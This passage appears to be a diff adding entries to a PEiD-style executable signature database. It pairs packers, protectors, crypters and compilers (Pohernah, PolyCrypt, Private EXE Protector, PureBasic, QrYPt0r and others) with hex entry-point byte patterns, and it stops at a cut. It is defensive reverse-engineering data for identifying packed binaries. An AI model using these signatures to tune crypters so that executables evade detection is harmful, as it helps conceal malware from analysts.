+[PluginToExe v1.02 -> BoB / BobSoft]
+signature = E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00
+ep_only = true
+
+[PMODE/W v.1.12, 1.16, 1.21, 1.33 DOS extender]
+signature = FC 16 07 BF ?? ?? 8B F7 57 B9 ?? ?? F3 A5 06 1E 07 1F 5F BE ?? ?? 06 0E A4
+ep_only = true
+
+[PocketPC ARM]
+signature = F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00
+ep_only = true
+
+[PocketPC MIB]
+signature = E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00
+ep_only = true
+
+[PocketPC SHA]
+signature = 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09
+ep_only = true
+
+[Pohernah 1.0.0 - by Kas]
+signature = 58 60 E8 00 00 00 00 5D 81 ED 20 25 40 00 8B BD 86 25 40 00 8B 8D 8E 25 40 00 6B C0 05 83 F0 04 89 85 92 25 40 00 83 F9 00 74 2D 81 7F 1C AB 00 00 00 75 1E 8B 77 0C 03 B5 8A 25 40 00 31 C0 3B 47 10 74 0E 50 8B 85 92 25 40 00 30 06 58 40 46 EB ED 83 C7 28 49 EB CE 8B 85 82 25 40 00 89 44 24 1C 61 FF E0
+ep_only = true
+
+[Pohernah 1.0.1 - by Kas]
+signature = 60 E8 00 00 00 00 5D 81 ED F1 26 40 00 8B BD 18 28 40 00 8B 8D 20 28 40 00 B8 38 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 1C 28 40 00 31 C0 51 31 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 1C 28 40 00 8B 85 24 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 38 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 14 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3
+ep_only = true
+
+[Pohernah 1.0.2 - by Kas]
+signature = 60 E8 00 00 00 00 5D 81 ED DE 26 40 00 8B BD 05 28 40 00 8B 8D 0D 28 40 00 B8 25 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 09 28 40 00 31 C0 51 31 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 09 28 40 00 8B 85 11 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 25 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 01 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3
+ep_only = true
+
+[Pohernah 1.0.3 - by Kas]
+signature = 60 E8 00 00 00 00 5D 81 ED 2A 27 40 00 31 C0 40 83 F0 06 40 3D 40 1F 00 00 75 07 BE 6A 27 40 00 EB 02 EB EB 8B 85 9E 28 40 00 83 F8 01 75 17 31 C0 01 EE 3D 99 00 00 00 74 0C 8B 8D 86 28 40 00 30 0E 40 46 EB ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3
+ep_only = true
+
+[PolyBox C -> Anskya]
+signature = 55 8B EC 83 C4 F0 53 56 B8 E4 41 00 10 E8 3A E1 FF FF 33 C0 55 68 11 44 00 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 6A 0A 68 20 44 00 10 A1 1C 71 00 10 50 E8 CC E1 ?? ?? ?? ?? 85 DB 0F 84 77 01 00 00 53 A1 1C 71 00 10 50 E8 1E E2 FF FF 8B F0 85 F6 0F 84 61 01 00 00 53 A1 1C 71 00 10 50 E8 E0 E1 FF FF 85 C0 0F 84 4D 01 00 00 50 E8 DA E1 FF FF 8B D8 85 DB 0F 84 3D 01 00 00 56 B8 70 80 00 10 B9 01 00 00 00 8B 15 98 41 00 10 E8 9E DE FF FF 83 C4 04 A1 70 80 00 10 8B CE 8B D3 E8 E1 E1 FF FF 6A 00 6A 00 A1 70 80 00 10 B9 30 44 00 10 8B D6 E8 F8 FD FF FF
+ep_only = false
+
+[PolyBox D -> Anskya]
+signature = 55 8B EC 33 C9 51 51 51 51 51 53 33 C0 55 68 84 2C 40 00 64 FF 30 64 89 20 C6 45 FF 00 B8 B8 46 40 00 BA 24 00 00 00 E8 8C F3 FF FF 6A 24 BA B8 46 40 00 8B 0D B0 46 40 00 A1 94 46 40 00 E8 71 FB FF FF 84 C0 0F 84 6E 01 00 00 8B 1D D0 46 40 00 8B C3 83 C0 24 03 05 D8 46 40 00 3B 05 B4 46 40 00 0F 85 51 01 00 00 8D 45 F4 BA B8 46 40 00 B9 10 00 00 00 E8 A2 EC FF FF 8B 45 F4 BA 9C 2C 40 00 E8 F1 ED FF FF
+ep_only = false
+
+[PolyCrypt PE - 2.1.4b/2.1.5 -> JLab Software Creations (h-oep)]
+signature = 91 8B F4 AD FE C9 80 34 08 ?? E2 FA C3 60 E8 ED FF FF FF EB
+ep_only = false
+
+[PolyCrypt PE - 2.1.4b/2.1.5 -> JLab Software Creations (h-signed)]
+signature = 50 6F 6C 79 43 72 79 70 74 20 50 45 20 28 63 29 20 32 30 30 34 2D 32 30 30 35 2C 20 4A 4C 61 62 53 6F 66 74 77 61 72 65 2E 00 50 00 43 00 50 00 45
+ep_only = false
+
+[PolyCryptor by SMT Version %v3.%v4]
+signature = EB ?? 28 50 6F 6C 79 53 63 72 79 70 74 20 ?? ?? ?? 20 62 79 20 53 4D 54 29
+ep_only = true
+
+[PolyEnE V0.01+ -> Lennart Hedlund]
+signature = 50 6F 6C 79 45 6E 45 00 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C
+ep_only = false
+
+[PoPa 0.01 (Packer on Pascal) -> bagie]
+signature = 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 A4 3E 00 10 E8 30 F6 FF FF 33 C0 55 68 BE 40 00 10 ?? ?? ?? ?? 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 62 E7 FF FF 8B 45 EC E8 32 F2 FF FF 50 E8 B4 F6 FF FF A3 64 66 00 10 33 D2 55 68 93 40 00 10 64 FF 32 64 89 22 83 3D 64 66 00 10 FF 0F 84 3A 01 00 00 6A 00 6A 00 6A 00 A1 64 66 00 10 50 E8 9B F6 FF FF 83 E8 10 50 A1 64 66 00 10 50 E8 BC F6 FF FF 6A 00 68 80 66 00 10 6A 10 68 68 66 00 10 A1 64 66 00 10 50 E8 8B F6 FF FF
+ep_only = true
+
+[PPC-PROTECT 1.1X -> Alexey Gorchakov]
+signature = FF 5F 2D E9 20 00 9F E5 00 00 90 E5 18 00 8F E5 18 00 9F E5 00 00 90 E5 10 00 8F E5 01 00 A0 E3 00 00 00 EB 02 00 00 EA 04 F0 1F E5
+ep_only = true
+
+[PrincessSandy v1.0 eMiNENCE Process Patcher Patch]
+signature = 68 27 11 40 00 E8 3C 01 00 00 6A 00 E8 41 01 00 00 A3 00 20 40 00 8B 58 3C 03 D8 0F B7 43 14 0F B7 4B 06 8D 7C 18 18 81 3F 2E 4C 4F 41 74 0B 83 C7 28 49 75 F2 E9 A7 00 00 00 8B 5F 0C 03 1D 00 20 40 00 89 1D 04 20 40 00 8B FB 83 C7 04 68 4C 20 40 00 68 08
+ep_only = false
+
+[Private EXE Protector 1.8]
+signature = BB DC EE 0D 76 D9 D0 8D 16 85 D8 90 D9 D0
+ep_only = false
+
+[Private EXE Protector 1.8 -> SetiSoft]
+signature = A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 FF 31 F6 C3
+ep_only = false
+
+[Private EXE Protector 1.9.7 -> SetiSoft]
+signature = 55 8B EC 83 C4 F4 FC 53 57 56 8B 74 24 20 8B 7C 24 24 66 81 3E 4A 43 0F 85 A5 02 00 00 83 C6 0A 33 DB BA 00 00 00 80 C7 44 24 14 08 00 00 00 43 8D A4 24 00 00 00 00 8B FF 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 2C 8B 4C 24 10 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 02 44 24 0C 88 07 47 EB C6 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 82 6E 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 83 DC 00 00 00 B9 04 00 00 00 33 C0 8D A4 24 00 00 00 00 8D 64 24 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 48 74 B1 0F 89 EF 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 42 BD 00 01 00 00 B9 08 00 00 00 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 88 07 47 4D 75 D6
+ep_only = false
+
+[Private Exe Protector 1.x -> setisoft]
+signature = B8 ?? ?? ?? ?? B9 ?? 90 01 ?? BE ?? 10 40 ?? 68 50 91 41 ?? 68 01 ?? ?? ?? C3
+ep_only = true
+
+[Private EXE Protector 2.0 -> SetiSoft]
+signature = 89 ?? ?? 38 00 00 00 8B ?? 00 00 00 00 81 ?? ?? ?? ?? ?? 89 ?? 00 00 00 00 81 ?? 04 00 00 00 81 ?? 04 00 00 00 81 ?? 00 00 00 00 0F 85 D6 FF FF FF
+ep_only = false
+
+[Private exe Protector 2.0 -> SetiSoft Team]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00
+ep_only = false
+
+[Private exe Protector 2.15-2.2X -> SetiSoft Team]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00
+ep_only = false
+
+[Private exe Protector V1.8 -> SetiSoft Team]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = false
+
+[Private EXE v2.0a]
+signature = 53 E8 00 00 00 00 5B 8B C3 2D
+ep_only = true
+
+[Private Personal Packer (PPP) 1.0.2 -> ConquestOfTroy.com]
+signature = E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9
+ep_only = false
+
+[Private Personal Packer (PPP) 1.0.3 -> ConquestOfTroy.com]
+signature = E8 19 00 00 00 90 90 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9
+ep_only = true
+
+[Private Personal Packer (PPP) v1.0.2 --> ConquestOfTroy.com]
+signature = E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00
+ep_only = true
+
+[PrivateEXE v2.0a]
+signature = 06 60 C8 ?? ?? ?? 0E 68 ?? ?? 9A ?? ?? ?? ?? 3D ?? ?? 0F ?? ?? ?? 50 50 0E 68 ?? ?? 9A ?? ?? ?? ?? 0E
+ep_only = true
+
+[PrivateEXE v2.0a]
+signature = 53 E8 ?? ?? ?? ?? 5B 8B C3 2D ?? ?? ?? ?? 50 81 ?? ?? ?? ?? ?? 8B
+ep_only = true
+
+[PRO-PACK v2.08]
+signature = 8C D3 8E C3 8C CA 8E DA 8B 0E ?? ?? 8B F1 83 ?? ?? 8B FE D1 ?? FD F3 A5 53
+ep_only = true
+
+[PRO-PACK v2.08, emphasis on packed size, locked]
+signature = 83 EC ?? 8B EC BE ?? ?? FC E8 ?? ?? 05 ?? ?? 8B C8 E8 ?? ?? 8B
+ep_only = true
+
+[ProActivate V1.0X -> TurboPower Software Company]
+signature = 55 8B EC B9 0E 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? ?? ?? ?? 90 90 90 90 90 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 83 C0 05 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 E8 85 E2 FF FF 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 7A 81 3D ?? ?? ?? ?? 43 52 43 33 75 6E 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 62 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 56 81 3D ?? ?? ?? ?? 43 52 43 33 75 4A 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 3E 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 32 81 3D ?? ?? ?? ?? 43 52 43 33
+ep_only = true
+
+[Program Protector XP v1.0]
+signature = E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50
+ep_only = true
+
+[Protect Shareware V1.1 -> eCompserv CMS]
+signature = 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 ?? 01 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 34 00 ?? 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00
+ep_only = false
+
+[PROTECT! EXE/COM v6.0]
+signature = 1E B4 30 CD 21 3C 02 73 ?? CD 20 BE ?? ?? E8
+ep_only = true
+
+[Protection Plus vx.x]
+signature = 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85
+ep_only = true
+
+[pscrambler 1.2 -> by p0ke]
+signature = 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 ?? ?? ?? ?? 10 E8 2D F3 FF FF 33 C0 55 68 E8 31 00 10 64 FF 30 64 89 20 8D 45 E0 E8 53 F5 FF FF 8B 45 E0 8D 55 E4 E8 30 F6 FF FF 8B 45 E4 8D 55 E8 E8 A9 F4 FF FF 8B 45 E8 8D 55 EC E8 EE F7 FF FF 8B 55 EC B8 C4 54 00 10 E8 D9 EC FF FF 83 3D C4 54 00 10 00 0F 84 05 01 00 00 80 3D A0 40 00 10 00 74 41 A1 C4 54 00 10 E8 D9 ED FF FF E8 48 E0 FF FF 8B D8 A1 C4 54 00 10 E8 C8 ED FF FF 50 B8 C4 54 00 10 E8 65 EF FF FF 8B D3 59 E8 69 E1 FF FF 8B C3 E8 12 FA FF FF 8B C3 E8 33 E0 FF FF E9 AD 00 00 00 B8 05 01 00 00 E8 0C E0 FF FF 8B D8 53 68 05 01 00 00 E8 57 F3 FF FF 8D 45 DC 8B D3 E8 39 ED FF FF 8B 55 DC B8 14 56 00 10 B9 00 32 00 10 E8 BB ED FF FF 8B 15 14 56 00 10 B8 C8 54 00 10 E8 53 E5 FF FF BA 01 00 00 00 B8 C8 54 00 10 E8 8C E8 FF FF E8 DF E0 FF FF 85 C0 75 52 6A 00 A1 C4 54 00 10 E8 3B ED FF FF 50 B8 C4 54 00 10 E8 D8 EE FF FF 8B D0 B8 C8 54 00 10 59 E8 3B E6 FF FF E8 76 E0 FF FF B8 C8 54 00 10 E8 4C E6 FF FF E8 67 E0 FF FF 6A 00 6A 00 6A 00 A1 14 56 00 10 E8 53 EE FF FF 50 6A 00 6A 00 E8 41 F3 FF FF 80 3D 9C 40 00 10 00 74 05 E8 EF FB FF FF 33 C0 5A 59 59 64 89 10 68 EF 31 00 10 8D 45 DC BA 05 00 00 00 E8 7D EB FF FF C3 E9 23 E9 FF FF EB EB 5B E8 63 EA FF FF 00 00 00 FF FF FF FF 08 00 00 00 74 65 6D 70 2E 65 78 65
+ep_only = true
+
+[PUNiSHER v1.5 (DEMO) -> FEUERRADER/AHTeam]
+signature = EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04
+ep_only = true
+
+[PUNiSHER v1.5 (DEMO) -> FEUERRADER/AHTeam]
+signature = EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED
+ep_only = true
+
+[PUNiSHER V1.5 Demo-> FEUERRADER]
+signature = EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00
+ep_only = true
+
+[PUNiSHER V1.5-> FEUERRADER]
+signature = 3F 00 00 80 66 20 ?? 00 7E 20 ?? 00 92 20 ?? 00 A4 20 ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32
+ep_only = false
+
+[PuNkMoD 1.x -> PuNkDuDe]
+signature = 94 B9 ?? ?? 00 00 BC ?? ?? ?? ?? 80 34 0C
+ep_only = false
+
+[PureBasic 4.x -> Neil Hodgson]
+signature = 68 ?? ?? 00 00 68 00 00 00 00 68 ?? ?? ?? 00 E8 ?? ?? ?? 00 83 C4 0C 68 00 00 00 00 E8 ?? ?? ?? 00 A3 ?? ?? ?? 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? ?? ?? 00 A3
+ep_only = true
+
+[PureBasic 4.x DLL -> Neil Hodgson]
+signature = 83 7C 24 08 01 75 0E 8B 44 24 04 A3 ?? ?? ?? 10 E8 22 00 00 00 83 7C 24 08 02 75 00 83 7C 24 08 00 75 05 E8 ?? 00 00 00 83 7C 24 08 03 75 00 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? 0F 00 00 A3
+ep_only = true
+
+[PureBasic DLL -> Neil Hodgson]
+signature = 83 7C 24 08 01 75 ?? 8B 44 24 04 A3 ?? ?? ?? 10 E8
+ep_only = true
+
+[QrYPt0r - by NuTraL]
+signature = 80 F9 00 0F 84 8D 01 00 00 8A C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 C1 3C F3 75 89 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BA D9 04 00 00 E8 00 00 00 00 5F 81 C7 16 01 00 00 80 2C 3A 01
+ep_only = false
+
+[QrYPt0r - by NuTraL]
+signature = 86 18 CC 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 BB 00 00 F7 BF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B8 78 56 34 12 87 03 E8 CD FE FF FF E8 B3
+ep_only = false
+
+[QrYPt0r - by NuTraL]
+signature = EB 00 E8 B5 00 00 00 E9 2E 01 00 00 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 8B 44 24 04
+ep_only = true
+
+[R!SC's Process Patcher v1.4]
+signature = E8 E1 01 00 00 80 38 22 75 13 80 38 00 74 2E 80 38 20 75 06 80 78 FF 22 74 18 40 EB ED 80 38 00 74 1B EB 19 40 80 78 FF 20 75 F9 80 38 00 74 0D EB 0B 40 80 38 00 74 05 80 38 22 74 00 8B F8 B8 04 60 40 00 68 00 20 40 00 C7 05 A2 20 40 00 44 00 00 00 68 92
+ep_only = false
+
+[R!SC's Process Patcher v1.5.1]
